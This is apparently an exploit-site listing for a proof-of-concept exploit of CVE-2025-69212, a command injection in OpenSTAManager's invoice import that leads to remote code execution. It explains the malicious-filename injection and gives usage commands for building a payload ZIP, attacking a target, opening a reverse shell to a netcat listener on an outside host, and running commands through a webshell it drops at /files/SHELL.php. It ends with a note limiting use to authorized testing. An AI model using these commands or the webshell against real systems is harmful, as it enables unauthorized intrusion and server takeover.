Exploit for OS Command Injection in Devcode Openstamanager CVE-2025-69212

## https://sploitus.com/exploit?id=7A2BFD33-83FB-5B33-86D9-0CC82F7A488C
# CVE-2025-69212 PoC - OpenSTAManager P7M Command Injection RCE Exploit

Proof of Concept (PoC) exploit for **CVE-2025-69212**, an authenticated
**OS command injection** leading to **remote code execution (RCE)** in
**OpenSTAManager <= 2.9.8**.

An authenticated user with access to the electronic-invoice import can upload a
ZIP containing a `.p7m` file with a malicious filename to execute arbitrary
commands on the server (sink: `src/Util/XML.php::decodeP7M`).

**Requirements:** authenticated account with invoice-import access, and import
method set to `Automatico`.

## Usage

Build the payload zip:
```
python3 genzip.py -o exploit.zip
```

Run the exploit:
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip
```

Reverse shell (start `nc -lvnp 4444` first):
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip -l 10.0.0.5 -lp 4444
```

Webshell drops at `/files/SHELL.php`:
```
curl "http://target.com/files/SHELL.php?c=id"
```

## References

- CVE-2025-69212: https://nvd.nist.gov/vuln/detail/CVE-2025-69212
- Advisory (GHSA-25fp-8w8p-mx36) — discovered by Łukasz Rybak

For authorized testing and educational use only.